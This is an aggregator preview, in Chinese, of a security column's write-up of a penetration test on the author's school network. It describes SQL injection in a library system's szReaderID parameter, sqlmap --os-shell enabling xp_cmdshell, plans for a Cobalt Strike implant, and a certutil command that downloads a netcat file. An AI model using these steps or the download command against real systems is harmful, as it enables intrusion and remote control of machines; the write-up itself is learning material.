专栏名称: 亿人安全
知其黑,守其白。手握利剑,心系安全。主要研究方向包括:Web、内网、红蓝对抗、代码审计、安卓逆向、工控、ctf系列。
今天看啥  ›  专栏  ›  亿人安全

实战 | 对自己学校内网的渗透测试

亿人安全  · 公众号  ·  · 2024-08-26 21:43

文章预览

原文首发在:奇安信攻防社区 https://forum.butian.net/share/3671 ‍ ‍ 一直以来都想拿自己学校的内网练练手,跟负责网安的老师说了一声后,回去直接开搞。这里作了比较详细的记录,希望大家能多多指点。 一、图书馆管理系统 1.1 SQL注入开启xp_cmdshell 1.1.1 首先是图书馆管理系统,这个系统是开在公网的。目录扫描发现Web Api Help接口文档泄露。我们拼接上图的第二个接口,发现在szReaderID参数处传入单数个单引号,就会报错;传入双数个单引号,就会回显操作成功。证明很可能存在注入。 1.1.2 sqlmap跑一下。因为是sql server,所以可以直接--os-shell开启xp_cmdshell来命令执行。当前的权限还很低,为了进一步提权,得上个CS马。 1.2 尝试远程下载上线CS 1.2.1 以下是一些常用的远程下载命令 certutil -urlcache -split -f http://127.0.0.1:8080/nc.txt c:\\nc.txt  //certutil下载文件 bit ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览